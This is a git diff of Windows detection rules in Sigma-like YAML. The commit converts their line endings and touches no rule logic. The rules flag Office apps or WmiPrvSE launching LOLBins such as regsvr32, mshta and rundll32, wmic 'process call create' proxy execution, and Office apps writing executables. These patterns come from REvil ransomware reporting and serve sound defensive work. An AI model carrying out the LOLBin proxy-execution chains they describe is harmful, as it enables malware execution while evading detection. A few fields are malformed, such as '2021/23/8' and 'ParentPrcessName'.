diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml
index 62db1db1..f567b8d6 100644
--- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml
+++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml
@@ -1,37 +1,37 @@ -title: Lolbins Process Creation with WmiPrvse -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: security - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventLog: security - EventID: 4688 - selection2: - NewProcessName|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentProcessName|endswith: - - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Lolbins Process Creation with WmiPrvse +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. 
+ selection1: + EventLog: security + EventID: 4688 + selection2: + NewProcessName|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentProcessName|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 6842e7ca..f4797751 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml 
@@ -1,47 +1,47 @@ -title: Excel Proxy Executing Regsvr32 With Payload -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: security - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventLog: security - EventID: 4688 - selection2: - ProcessCommandLine: - - '*regsvr32*' - - '*rundll32*' - - '*msiexec*' - - '*mshta*' - - '*verclsid*' - selection3: - - ProcessName: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - selection4: - ParentProcessName|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - selection5: - processCommandLine|contains|all: - - 'process' - - 'create' - - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 -falsepositives: -- Unknown -level: high +title: Excel Proxy Executing Regsvr32 With Payload +description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. 
Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: security + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventLog: security + EventID: 4688 + selection2: + ProcessCommandLine: + - '*regsvr32*' + - '*rundll32*' + - '*msiexec*' + - '*mshta*' + - '*verclsid*' + selection3: + - ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + ParentProcessName|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 845e84e2..57d0d164 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml 
@@ -1,36 +1,36 @@ -title: Office Applications Spawning Wmi Cli -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: windows - service: security - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - - EventLog: security - selection2: - - EventID: 4688 - selection3: - - ProcessName: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - selection4: - - ParentProcessName: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 AND selection4 -falsepositives: -- Unknown -level: high +title: Office Applications Spawning Wmi Cli +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + service: security + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + - EventLog: security + selection2: + - EventID: 4688 + selection3: + - 
ProcessName: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + selection4: + - ParentProcessName: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 AND selection4 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 0b20eece..4e96dc74 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml 
@@ -1,32 +1,32 @@ -title: WMI Command Execution by Office Applications -description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: EndPoint Detection Logs - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - EventLog: EDR - EventType: WMIExecution - WMIcommand: '*Win32_Process\:\:Create*' - selection2: - - Image: - - '*\winword.exe' - - '*\excel.exe' - - '*\powerpnt.exe' - condition: selection1 AND selection2 -falsepositives: -- Unknown -level: high +title: WMI Command Execution by Office Applications +description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: EndPoint Detection Logs + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + EventLog: EDR + EventType: WMIExecution + WMIcommand: '*Win32_Process\:\:Create*' + selection2: + - Image: + - 
'*\winword.exe' + - '*\excel.exe' + - '*\powerpnt.exe' + condition: selection1 AND selection2 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index e2411d65..6a568b55 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
@@ -1,49 +1,49 @@ -title: Executable and Files creation by Office Applications -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - service: Sysmon - category: process_creation -detection: - #useful_information: Please add more file extentions and magic bytes to the logic of your choice. - selection1: - EventType: - - FileCreate - - FileRename - EventID: 11 - selection2: - Image|endswith: - - 'winword.exe' - - 'excel.exe' - - 'powerpnt.exe' - selection3: - FileName|endswith: - - ".exe" - - ".dll" - - ".ocx" - - ".com" - - ".ps1" - - ".vbs" - - ".sys" - - ".bat" - - ".scr" - - ".proj" - selection4: - FileMagicBytes|startswith: - - "4D5A" - condition: selection1 AND selection2 AND (selection3 OR selection4) -falsepositives: -- Unknown -level: high +title: Executable and Files creation by Office Applications +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. 
+references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + service: Sysmon + category: process_creation +detection: + #useful_information: Please add more file extentions and magic bytes to the logic of your choice. + selection1: + EventType: + - FileCreate + - FileRename + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + FileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + selection4: + FileMagicBytes|startswith: + - "4D5A" + condition: selection1 AND selection2 AND (selection3 OR selection4) +falsepositives: +- Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index a91cfcc2..bf8dbf9f 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml 
@@ -1,37 +1,37 @@ -title: LOLBins Process Created With Office Application -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 -falsepositives: - - Unknown -level: high +title: LOLBins Process Created With Office Application +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. 
+ selection1: + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 AND selection3 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 055e8faf..5423077e 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml 
@@ -1,35 +1,35 @@ -title: LOLBins Process Created With WmiPrvSE -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection3: - ParentImage|endswith: - - "\\wbem\\WmiPrvSE.exe" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. -level: high +title: LOLBins Process Created With WmiPrvSE +description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. 
+ selection1: + EventID: 1 + selection2: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection3: + ParentImage|endswith: + - "\\wbem\\WmiPrvSE.exe" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- FPs are possible here, but some LOLBins weren't excluded for obvious reasons. +level: high diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index bd8f9bfb..6ee87b6c 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml 
@@ -1,47 +1,47 @@ -title: Excel Proxy Executing Regsvr32 With Payload -description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - EventID: 1 - selection2: - - Image: '*\wbem\WMIC.exe' - - ProcessCommandLine: '*wmic *' - - OriginalFileName: 'wmic.exe' - - Description: 'WMI Commandline Utility' - selection3: - CommandLine|contains: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection4: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - selection5: - processCommandLine|contains|all: - - 'process' - - 'create' - - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 -falsepositives: -- Unknown -level: high +title: Excel Proxy Executing Regsvr32 With Payload +description: Excel called wmic to finally proxy execute regsvr32 with the payload. 
An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + EventID: 1 + selection2: + - Image: '*\wbem\WMIC.exe' + - ProcessCommandLine: '*wmic *' + - OriginalFileName: 'wmic.exe' + - Description: 'WMI Commandline Utility' + selection3: + CommandLine|contains: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection4: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + selection5: + processCommandLine|contains|all: + - 'process' + - 'create' + - 'call' + condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 +falsepositives: +- Unknown +level: high From be442182fe2543c7cd45820ed5e7b93ab6b068b1 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 6 Sep 2021 21:10:08 +0200 Subject: [PATCH 0760/1367] convert to LF --- ...ocess_Creations_by_Office_applications.yml | 72 ++++++++-------- ...ice_applications_using_file_extentions.yml | 84 +++++++++---------- ...Applications_Spawning_WMI_command-line.yml | 70 ++++++++-------- 3 files changed, 113 insertions(+), 113 deletions(-) 
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
index 287a7208..84e82010 100644
--- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
+++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml
@@ -1,36 +1,36 @@ -title: Created Executables and Files by Office Applications -id: a9505d16-644f-4f24-9002-7c322675e40d -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 -falsepositives: - - Unknown -level: high +title: Created Executables and Files by Office Applications +id: a9505d16-644f-4f24-9002-7c322675e40d +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. 
+references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/08/23 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + selection1: + Image|endswith: + - 'regsvr32' + - 'rundll32' + - 'msiexec' + - 'mshta' + - 'verclsid' + selection2: + ParentImage|endswith: + - winword.exe + - excel.exe + - powerpnt.exe + condition: selection1 AND selection2 +falsepositives: + - Unknown +level: high diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 81a3348f..0193aefe 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml 
@@ -1,42 +1,42 @@ -title: Created Executables and Files by Office Applications -description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: Please add more file extentions to the logic of your choice. - selection1: - EventID: 11 - selection2: - Image|endswith: - - 'winword.exe' - - 'excel.exe' - - 'powerpnt.exe' - selection3: - TargetFileName|endswith: - - ".exe" - - ".dll" - - ".ocx" - - ".com" - - ".ps1" - - ".vbs" - - ".sys" - - ".bat" - - ".scr" - - ".proj" - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Created Executables and Files by Office Applications +description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. 
+references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: Windows + category: process_creation +detection: + #useful_information: Please add more file extentions to the logic of your choice. + selection1: + EventID: 11 + selection2: + Image|endswith: + - 'winword.exe' + - 'excel.exe' + - 'powerpnt.exe' + selection3: + TargetFileName|endswith: + - ".exe" + - ".dll" + - ".ocx" + - ".com" + - ".ps1" + - ".vbs" + - ".sys" + - ".bat" + - ".scr" + - ".proj" + condition: selection1 AND selection2 AND selection3 +falsepositives: +- Unknown +level: high diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 92cb14f0..74777966 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml 
@@ -1,35 +1,35 @@ -title: Office Applications Spawning Wmi Cli -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defence_evasion -status: experimental -Date: 2021/23/8 -logsource: - product: windows - category: process_creation -detection: - #useful_information: Add more office applications to the rule logic of choice - selection1: - EventID: 1 - selection2: - - Image: '\wbem\WMIC.exe' - - CommandLine: '*wmic *' - - OriginalFileName: 'wmic.exe' - - Description: 'WMI Commandline Utility' - selection3: - - ParentPrcessName|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 AND selection3 -falsepositives: -- Unknown -level: high +title: Office Applications Spawning Wmi Cli +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion +status: experimental +Date: 2021/23/8 +logsource: + product: windows + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + selection1: + EventID: 1 + selection2: + - Image: '\wbem\WMIC.exe' + - CommandLine: '*wmic *' + - OriginalFileName: 
